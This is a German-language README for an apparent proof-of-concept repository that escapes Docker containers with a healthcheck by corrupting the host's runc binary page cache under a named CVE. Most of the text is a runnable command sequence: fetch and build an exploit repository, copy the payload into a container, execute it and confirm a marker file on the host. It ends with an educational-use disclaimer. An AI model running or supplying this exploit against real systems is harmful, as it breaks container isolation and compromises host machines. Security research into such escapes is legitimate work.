
# Container-Escape bei jedem Docker-Container mit aktiviertem Healthcheck über CVE-2026-31431
https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e
In diesem Repository wird docker-compose.yml bereitgestellt, um einen anfälligen Container einzurichten. Du kannst auch jeden anderen anfälligen Container verwenden oder deinen eigenen einrichten, aber denke daran, den Exploit-Code entsprechend anzupassen.
# Auf der Host-Maschine
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh
# Innerhalb des copyfail-Containers
cd /tmp
chmod +x exp.sh exploit
./exp.sh
# Ein paar Minuten warten, bis der Healthcheck läuft
# und prüfen, ob /tmp/pwned auf dem Host erstellt wurde
# Auf der Host-Maschine
ls /tmp/pwned
Sobald der Exploit erfolgreich ist, wird der Pagecache der runc-Binärdatei auf der Host-Maschine beschädigt. Du kannst ihn wiederherstellen, indem du echo 3 | sudo tee /proc/sys/vm/drop_caches auf dem Host ausführst.
Dieses Repository dient nur zu Bildungszwecken. Es sollte nicht für böswillige Aktivitäten verwendet werden. Der Autor ist nicht verantwortlich für Schäden, die durch die missbräuchliche Verwendung dieses Codes entstehen. Verwende es immer in einer kontrollierten und legalen Umgebung.